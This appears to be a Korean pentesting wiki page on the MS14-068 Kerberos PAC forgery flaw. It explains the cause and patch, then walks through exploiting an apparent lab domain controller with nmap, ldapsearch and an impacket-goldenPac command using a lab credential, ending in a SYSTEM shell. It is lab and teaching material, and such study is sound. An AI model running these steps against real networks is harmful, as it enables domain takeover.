펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Active Directory
      • Golden Ticket
      • DC Shadow
      • RID Hijacking
    • Local
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM
      • WMI Event Subscription
      • SSH Key Injection
      • DLL Hijacking
      • DLL SideLoading
      • Create Account
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • WriteOwner
        • GenericAll
        • GenericWrite
        • WriteSPN
        • AddMembers
        • WriteProperty
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Ticket
      • KrbRelayUp
    • Windows
      • SeImpersonatePrivilege
      • Unquoted Service Path
      • Weak Service Permissions
      • Weak Service Binary Permissions
      • UAC Bypass
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
  • 민감정보 탈취
    • Active Directory
      • DCSync
      • LSASS
      • AS-REP-Roasting
      • AS Requested Service Tickets
      • Kerberoasting
      • Targeted Kerberoast
      • Shadow Credentials
      • Backup Operators
      • SeEnableDelegationPrivilege
    • Windows
      • Unattended File
      • Browser Stored Credentials
      • NTLM Relay
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Port Forwarding
    • SMB/Windows Admin Shares
    • RDP
    • DCOM
    • WinRM
    • Domain Trust Discovery
  • ETC
    • CS
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Active Directory Trusts
      • Delegation
      • OAuth 2.0
      • S4U
    • Tools
      • Cobalt Strike
      • BloodHound
      • Certipy-ad
      • LDAP Search
      • Hydra
Powered by GitBook
On this page
  • Practice
  • References

Was this helpful?

Export as PDF
  1. 권한 상승
  2. Active Directory

MS14-068

MS14-068은 2014년 10월에 발표된 MS의 Kerberos 인증 취약점입니다.

원래 Kerberoas 인증에서 Golden-Ticket은 KDC의 Key를 관리하는 krbtgt의 NT Hash를

알아야만 획득할 수 있지만, 이 취약점을 이용하면

krbtgt의 NT Hash 정보가 없더라도 Golden-Ticket을 획득할 수 있습니다.

  • 출시일 : 2014년 10월

  • CVE 번호 : CVE-2014-6324

  • 영향 받는 시스템

    • Windows Vista

    • Windows Server 2008

    • Windows Server 2008 R2

    • Windows Server 2012

    • Windows Server 2012 R2

    • Windows 7

    • Windows 8

    • Windows RT

    • Windows 8.1

    • Windows 10

  • 대응 방안 : Windows 패치 적용

취약점이 발생한 근본적인 이유는 PAC에 대한 KDC의 검증 로직 미흡이었습니다.

TGT를 전송하며 TGS REQ를 할 때 PAC도 같이 KDC에 전송이 되는데

이때 KDC에서는 PAC에 대한 검증을 하지 않고 TGT의 무결성에 대해서만 검증을 수행했습니다.

따라서 시나리오에서 공격자는 PAC이 포함되지 않은 AS-REQ를 한 뒤에

TGS-REQ에서는 MD5와 같은 해쉬 알고리즘을 사용하여 위조한 PAC 정보를 전송합니다.

PAC에 대한 검증이 없었으니 공격자가 위조한 높은 권한을 가진 ST이 발급되고

공격자는 ST을 통해 높은 권한의 사용자 서비스를 이용할 수 있습니다.

ST만 가지고 권한상승을 할 수 있는 이유는 ST을 패스워드 대신 사용하여

서비스 접근이 가능한 Pass The Ticket 때문입니다.

마치 NT Hash를 패스워드와 같이 사용하는 Pass The Hash와 유사합니다.

단 공격이 성공하기 위해서는 2가지 조건이 필요합니다.

  1. MS14-068에 취약한 환경

  2. Active Directory 내의 사용자 계정 정보

Practice

┌──(root㉿kali)-[~/Pentest/Machine]        
└─# cat detail               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 06:49 UTC
Nmap scan report for 10.10.10.52
Host is up (0.073s latency).               
                                            
PORT      STATE SERVICE      VERSION                                                    
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:                            
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)

서버는 Active Directory 환경의 Windows Server 2008 R2를 사용합니다.

OS 버전 자체는 MS14-068에 취약하기 때문에

사용자 계정을 획득한다면 impacket-golenpac 모듈을 사용하여 권한상승이 가능합니다.

MS14-068을 사용하기 위해서는 FQDN이 요구되어 ldapsearch를 통해 정보를 수집합니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# ldapsearch -x -H ldap://10.10.10.52 -s base | grep serverName:
serverName: CN=MANTIS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Config

FQDN이 MANTIS.htb.local이라는 정보를 수집했습니다.

원활한 사용을 위해서 /etc/hosts파일에 도메인 정보를 매핑시켜줍니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.10.10.52     mantis htb.local mantis.htb.local

획득한 사용자 계정을 토대로 PAC를 높은 권한으로 위조하여

골든 티켓을 획득하는 goldenPac 모듈을 사용하여 시스템 권한을 획득합니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file NRuVrvIL.exe
[*] Opening SVCManager on mantis.....
[*] Creating service FdAs on mantis.....
[*] Starting service FdAs.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

References

PreviousNon-PKINITNextServer Operators

Last updated 5 months ago

Was this helpful?

https://www.beyondtrust.com/resources/glossary/what-are-pass-the-ticket-attackswww.beyondtrust.com
LogoMS14-068 | The Hacker Recipes
LogoMicrosoft 보안 게시판 MS14-068 - 위험MicrosoftLearn
LogogoldenPac.py | The Hacker Tools
https://redfoxsec.com/blog/kerberos-attacks-part-2/